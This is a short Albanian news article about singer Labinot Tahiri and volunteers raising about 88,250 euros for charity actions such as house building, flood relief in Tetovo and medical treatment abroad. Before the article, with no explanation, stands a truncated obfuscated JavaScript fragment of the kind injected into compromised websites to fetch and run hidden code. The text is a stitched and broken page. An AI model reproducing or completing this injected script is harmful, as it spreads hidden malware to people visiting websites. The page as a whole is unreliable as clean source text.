;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Kjo është shifra që Labi me vullnetarë mblodhi për nevojtarët

By

Këngëtari Labinot Tahiri është shndërruar në sinonimin e humanitetit. Në pothuajse secilin rast që shfaqet në media për t’iu gjendur në ndihmë njerëzve në nevojë ai merr iniciativë.

Përmes rrjetit social Facebook, Labi ka përmbledhur në një postim të vetëm aksionet e ndërmarrura gjatë këtij viti të përkthyer edhe në shifra monetare. Në mesin e aksioneve veçohen ndërtime të shtëpive, ndihmë për vërshimet e rënda në Tetovë dhe para për familjet skamnore.

Këngëtari gjatë këtij viti ka investuar edhe në sport e kulturë duke mundësuar udhëtimin jashtë vendit për aktivitete sportive të pjesëtarëve të një klubi që u kthye me shtatë medalje nga garat në Strugë. Por ndër rastet që spikat më së shumëti është ai i Bleon Tërstenës nga Ferizaj i cili falë aksioneve u shërua jashtë vendit dhe pritet që gjatë këtij muaji të kthehet në Kosovë nga Gjermania.

Gjithë këto raste të paraqitura, përkthyer në shifra me një matematikë të thjeshtë kapin vlerën e afro 88.250 eurove që Labi me ata që iu bashkangjitën mblodhën përgjatë mbi 20 aktiviteteve.

Ndryshe këngëtari që ka shfaqur haptas ambiciet për politikë ka premtuar se nuk do ndalet, pasiqë edhe në vazhdim do të ndihmojë me aq sa ka mundësi. /Prive.al/

Artikuj të ngjashëm